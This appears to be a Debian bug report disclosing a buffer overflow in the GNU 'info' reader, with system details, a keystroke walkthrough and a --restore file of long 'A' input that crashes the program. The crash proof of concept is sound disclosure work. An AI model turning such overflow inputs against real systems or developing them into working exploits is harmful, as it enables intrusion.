GNU/Linux 'info Buffer Overflow
Package: info
Version: 4.7-2.1
Severity: grave
Tags: security
Justification: user security hole
-- System Information:
Debian Release: 3.1
APT prefers unstable
APT policy: (500, 'unstable')
Architecture: i386 (i686)
Kernel: Linux 2.6.7
Locale: LANG=C, LC_CTYPE=C
Versions of packages info depends on:
ii libc6 2.3.2.ds1-15 GNU C Library: Shared libraries an
ii libncurses5 5.4-4 Shared libraries for terminal hand
-- no debconf information
Information:
I have tested several versions (Debian stable, unstable and testing) and
have found that this bug exists in all versions tested. I have included
a small --restore script that can be used to leverage a simple Seg fault.
This buffer overflow is very trivial to leverage as there are several
bytes available (10-15+). It may be possible that arbitary system calls
could be made though this hole. It is also possible to leverage this
from the command line using the --restore=FILENAME flag, and need not
have the program running. Although it is not running as suid, or as a
daemon, in a case where info is being used as a public service, it may
be a security problem. This bug seems only to be accessable where the
file has xrefs available.
Walkthrough:
$ info info
[info screen comes up]
press 'g'
[Goto Node:]
type 'Expert Info' <enter>
(OR any other way to get to a page with xrefs)
press 'f'
Type in 225 or more bytes and press enter.
SEG FAULT!
Example File:
The following can be saved to a file and called as:
info info --restore=info.bug to create a segmentation fault.
[START info.bug]
gExpert Info
fAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
[END info.bug]